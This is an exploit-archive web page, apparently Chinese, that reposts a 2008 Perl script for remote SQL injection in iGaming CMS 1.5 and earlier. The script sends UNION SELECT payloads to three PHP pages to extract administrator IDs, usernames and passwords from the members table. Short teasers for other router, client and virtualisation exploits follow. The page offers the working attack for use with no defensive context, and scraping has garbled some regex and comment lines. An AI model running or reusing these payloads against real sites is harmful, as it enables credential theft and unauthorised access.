iGaming CMS - 网站

iGaming CMS

分类:Exploit · 发布时间:2023-03-20 13:56 · 阅读:9262

#!/usr/bin/perl # ---------------------------------------------------------- # iGaming

#!/usr/bin/perl
# ----------------------------------------------------------
# iGaming <= 1.5 Multiple Remote SQL Injection Exploit
# Perl Exploit - Output: id:admin:password
# Discovered On: 23/09/2008
# Discovered By: StAkeR - StAkeR[at]hotmail[dot]it
# Proud To Be Italian
# ----------------------------------------------------------
# Usage: perl exploit.pl http://localhost/iGaming
# ---------------------------------------------------------- use strict;
use LWP::UserAgent; my ($one,$two,$exec,$host,$http,$xxx,$view); $view = "' union select 0,0,1,2,concat(0x25,id,0x3a,pseudo,0x3a,pass,0x25),0,6,7,8 from sp_members WHERE id='1/*";
$exec = "' union select 1,concat(0x25,id,0x3a,pseudo,0x3a,pass,0x25),3 from sp_members where id='1/*";
$host = shift @ARGV;
$http = new LWP::UserAgent or die $!;
$http->agent("Mozilla/4.5 [en] (Win95; U)");
$http->timeout(1);
if($host !~ /^http:\/\/(. ?)$/)
{
print "[?] iGaming CMS <= 1.5 Multiple Remote SQL Injection Exploit\n";
print "[?] Usage: perl $0 http://[path]\n";
exit;
}
else
{
$one = $http->get($host.'/previews.php?browse='.$exec);
$two = $http->get($host.'/reviews.php?browse='.$exec);
$xxx = $http->get($host.'/index.php?do=viewarticle&id='.$view);

if($one->is_success or $two->is_success or $xxx->is_success)
{
die "$1\n" if $one->content =~ /%(. ?)%/;
die "$1\n" if $two->content =~ /%(. ?)%/;
die "$1\n" if $xxx->content =~ /%(. ?)%/;
}
else
{
die "[ ] Exploit Failed!\n";
}
}

相关文章

Belkin wireless G router ADSL2 modem Auth Bypass Exploit

html code to bypass the webinterface password protection of the Belkin wireless G router adsl2 modem. It worked on model F5D7632-4V6 with upgraded firmware 6.01.

Download Accelerator Plus - DAP 8.x m3u File Buffer Overflow Exploit (c)

#include #include /* DAP 8.x (.m3u) File BOF C Exploit for XP SP2,SP3 English SecurityFocus Advisory: Download Accelerator Plus (DAP) is prone to a buffer-overflow vulnerability because it fails

Sun xVM VirtualBox

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Core Security Technologies - CoreLabs Advisory http://www.coresecurity.com/corelabs/ Sun xVM VirtualBox Privilege Escalation Vulnerability *Advisory Information*

VMware Workstation (hcmon.sys 6.0.0.45731) Local DoS Vulnerability

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - - Orange Bat advisory - Name : VMWare Workstation (hcmon.sys 6.0.0.45731) Class : DoS Published : 2008-08-17 Credit : g_ (g_ # orange-bat # com) - -

WS_FTP Home/Professional FTP Client Remote Format String PoC

################################################################################################################## # # Ipswitch WS_FTP Home/WS_FTP Professional FTP Client Remote Format String vulnerability # Vendor : http://www.ipswitch.com

返回分类 返回首页